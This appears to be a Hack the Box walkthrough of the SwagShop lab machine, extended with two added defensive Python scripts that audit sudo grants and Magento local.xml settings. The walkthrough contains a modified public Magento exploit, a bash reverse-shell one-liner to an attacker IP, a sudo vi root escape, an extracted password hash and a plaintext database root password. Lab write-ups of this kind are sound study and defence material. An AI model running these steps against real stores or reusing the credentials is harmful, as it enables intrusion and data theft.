Walkthrough of the machine SwagShop from Hack the Box. Key findings include a lack of patching on an e-commerce site and inappropriate privileges being granted to a system account reachable by users.
Key findings noted from the machine SwagShop:
Nmap was used to complete an initial scan of the host (command: nmap -A -T4 -oA nmap/Swagshop 10.10.10.140). Abridged output is shown below:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Scan shows reported instances of:
The Nmap scan failed to fingerprint the operating system. The banner returned by OpenSSH (7.2p2 Ubuntu 4ubuntu2.8 is the OpenSSH build shipped with Ubuntu Xenial) suggests the machine is running Ubuntu Xenial, a reasonably recent operating system.
Loading up the web server presents what appears to be a normal Magento store.
Running magescan against the site (command: php magescan.phar scan:all http://10.10.10.140/) identifies the version as either 184.108.40.206 or 220.127.116.11:
Scanning http://10.10.10.140/...
Magento Information
+-----------+--------------------------------+
| Parameter | Value                          |
+-----------+--------------------------------+
| Edition   | Community                      |
| Version   | 184.108.40.206, 220.127.116.11 |
+-----------+--------------------------------+
Publicly available exploits for Magento were researched and tested against the machine. A modified version of the exploit at https://www.exploit-db.com/exploits/37977 was successful in providing access to the store administration panel.
Details of the modification made (command: diff 37977.py 37977-modified.py) are below:
9,23d8
<SNIP> - Removed comments at top of the script
30c15
< target = "http://target.com/"
---
> target = "http://10.10.10.140/index.php"
63,84d47
<SNIP> - Removed comments at the bottom of the script
Executing the exploit (command: python 37977-modified.py) then provided access to the admin panel:
WORKED Check http://10.10.10.140/index.php/admin with creds forme:forme
Researching attacks on Magento sites turned up the FrogHopper attack write-up (https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper). Based on that guide, the following steps were taken to get initial access to the machine:
Initial access was confirmed as the www-data user on a host running kernel 4.4.0-146. An interactive shell was then set up using bash (command: bash -c 'bash -i >& /dev/tcp/10.10.12.238/5565 0>&1').
Reviewing the system, the user.txt file was found in the /home/haris directory:
www-data@swagshop:/home/haris$ wc -c user.txt
wc -c user.txt
33 user.txt
Further basic enumeration reveals that the www-data user can run vi as root, without a password, on any path under /var/www/html/.
www-data@swagshop:/home/haris$ sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
Loading vi through sudo and running !bash from within the editor provides a root shell.
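The sudo entry above is the whole privilege-escalation path on this box: a web-server account, an interactive editor, NOPASSWD and a wildcard path. The script below is an added example written for this write-up (not part of the original walkthrough or of any tool it mentions). It parses the command section of `sudo -l` output, using the output shown above as a constructed sample alongside a narrowly scoped grant for contrast, and flags the combinations a defender would want to catch in a sudoers audit. The list of shell-escaping binaries is an assumption of the example and is not exhaustive.

```python
"""Audit the command section of `sudo -l` output for grants that amount to root.

Added example for this write-up, not part of the original walkthrough. The
sample output below is constructed from the SwagShop `sudo -l` result plus one
narrowly scoped grant for contrast.
"""
import re
from dataclasses import dataclass, field

# Editors, pagers and interpreters that can run commands or write arbitrary
# files when executed as root, so a sudo grant for them is effectively a root
# grant. An assumption of this example; the real list is much longer.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "nano", "less", "more", "man", "awk", "find", "python", "perl"}

# "(root) NOPASSWD: /usr/bin/vi /var/www/html/*"  ->  runas, tags, command line
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Constructed sample: the SwagShop grant plus a tightly scoped one.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
    (root) /bin/cat /var/log/apache2/access.log
"""


@dataclass
class SudoRule:
    runas: str
    tags: tuple
    command: str
    args: tuple
    findings: list = field(default_factory=list)


def parse_sudo_l(output: str) -> list:
    """Return a SudoRule for each line after 'may run the following commands'."""
    rules, in_commands = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = tuple(t.rstrip(":") for t in m.group("tags").split())
        parts = m.group("cmd").split()
        rules.append(SudoRule(m.group("runas").strip(), tags, parts[0], tuple(parts[1:])))
    return rules


def audit(rule: SudoRule) -> SudoRule:
    """Attach findings to a rule; an empty findings list means nothing flagged."""
    name = rule.command.rsplit("/", 1)[-1]
    if rule.runas in ("root", "ALL"):
        if rule.command == "ALL":
            rule.findings.append("unrestricted root: any command allowed")
        if name in SHELL_ESCAPE_BINARIES:
            rule.findings.append(f"{name} is interactive and can run commands as root from inside the program")
        if any("*" in a or "?" in a for a in rule.args):
            rule.findings.append("wildcard argument: the allowed path is only a glob, so the restriction is weak")
        if "NOPASSWD" in rule.tags and rule.findings:
            rule.findings.append("NOPASSWD: no credential is needed, so compromising this account means root")
    return rule


def audit_sudo_output(output: str) -> dict:
    """Map each flagged command to its list of findings."""
    result = {}
    for rule in parse_sudo_l(output):
        audit(rule)
        if rule.findings:
            result[rule.command] = rule.findings
    return result


if __name__ == "__main__":
    for command, findings in audit_sudo_output(SAMPLE_SUDO_L).items():
        print(command)
        for finding in findings:
            print("  -", finding)
```

Run against real `sudo -l` output piped in from each host, the same parser turns a wildcard editor grant for a service account into a finding rather than something only discovered after the fact; the fix on the SwagShop host would be to drop the editor grant entirely and, if the web account really needs to edit files under /var/www/html, give it ownership of that tree instead of root.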
The password hash for user haris ($6$vHexbEDw$yPt59EZF1JrEHwJ8qiwPNfzBEJd9ei.jG/Cdiw/Huj4pvX9tHovMR20ypKEcCjcxMb8lvlo9zu9BGYx1ipdRB/) was extracted. Cracking it was attempted but was unsuccessful.
The database credentials used by Magento were found in the file local.xml stored under /var/www/html/app/etc. The username is root and the password is fMVWh7bDHpgZkyfqQXreTjU9.
The identified database credentials were used to dump a local copy of the database.
root@kali2019:~/Documents/SwagShop# wc -c dbdump.txt
4134404 dbdump.txt
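The local.xml finding combines two separate weaknesses: Magento was given the database root account rather than a user limited to its own schema, and the file holding that credential was readable by the account the web server runs as. The script below is an added example for this write-up (not part of the original walkthrough or of Magento itself) that checks both from a defender's side. The XML layout follows Magento 1's app/etc/local.xml (config/global/resources/default_setup/connection); the sample file contents, the crypt key and the database password are constructed placeholders.

```python
"""Check a Magento 1 app/etc/local.xml for over-privileged database credentials,
a world-accessible file mode and the default admin front name.

Added example for this write-up, not part of the original walkthrough. The
sample below is constructed in the Magento 1 local.xml layout; the key and
password are placeholders, not values from the machine.
"""
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample in the Magento 1 local.xml layout (placeholder secrets).
SAMPLE_LOCAL_XML = """<?xml version="1.0"?>
<config>
  <global>
    <crypt><key><![CDATA[PLACEHOLDER-CRYPT-KEY]]></key></crypt>
    <resources>
      <db><table_prefix><![CDATA[]]></table_prefix></db>
      <default_setup>
        <connection>
          <host><![CDATA[localhost]]></host>
          <username><![CDATA[root]]></username>
          <password><![CDATA[PLACEHOLDER-DB-PASSWORD]]></password>
          <dbname><![CDATA[swagshop]]></dbname>
          <active>1</active>
        </connection>
      </default_setup>
    </resources>
  </global>
  <admin>
    <routers><adminhtml><args><frontName><![CDATA[admin]]></frontName></args></adminhtml></routers>
  </admin>
</config>
"""

# Database accounts that should never be used by an application. An assumption
# of this example; extend it for local naming conventions.
PRIVILEGED_DB_USERS = {"root", "admin", "mysql"}


def db_connections(xml_text: str) -> dict:
    """Return {setup_name: {host, username, dbname, has_password}} for each
    <resources>/<*_setup>/<connection> block (Magento allows more than one)."""
    root = ET.fromstring(xml_text)
    found = {}
    resources = root.find("./global/resources")
    if resources is None:
        return found
    for setup in resources:
        conn = setup.find("connection")
        if conn is None:
            continue
        text = lambda tag: (conn.findtext(tag) or "").strip()
        found[setup.tag] = {
            "host": text("host"),
            "username": text("username"),
            "dbname": text("dbname"),
            "has_password": bool(text("password")),
        }
    return found


def audit_local_xml(path: str) -> list:
    """List findings for a local.xml on disk: credential scope, mode, admin path."""
    findings = []
    with open(path, encoding="utf-8") as fh:
        xml_text = fh.read()
    for name, conn in db_connections(xml_text).items():
        if conn["username"].lower() in PRIVILEGED_DB_USERS:
            findings.append(f"{name}: database user '{conn['username']}' is a privileged account; "
                            f"Magento only needs a user limited to the '{conn['dbname']}' database")
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IROTH | stat.S_IWOTH):
        findings.append(f"file mode {oct(mode)} is world-accessible; the file should be readable "
                        "only by the web server user (for example 0640)")
    front = (ET.fromstring(xml_text).findtext("./admin/routers/adminhtml/args/frontName") or "").strip()
    if front == "admin":
        findings.append("admin panel uses the default /admin front name, which is trivial to locate")
    return findings


def audit_sample(mode: int = 0o644) -> list:
    """Write the constructed sample to a temp file with the given mode and audit it."""
    with tempfile.NamedTemporaryFile("w", suffix=".xml", delete=False) as tmp:
        tmp.write(SAMPLE_LOCAL_XML)
        path = tmp.name
    os.chmod(path, mode)
    try:
        return audit_local_xml(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for finding in audit_sample():
        print("-", finding)
```

Pointing audit_local_xml at a real installation's app/etc/local.xml reports the same three issues the walkthrough exploited by hand. Each has a cheap fix: create a dedicated MySQL user granted only on the store's schema, restrict local.xml to the web server user, and, on a public store, move the admin router away from the default name.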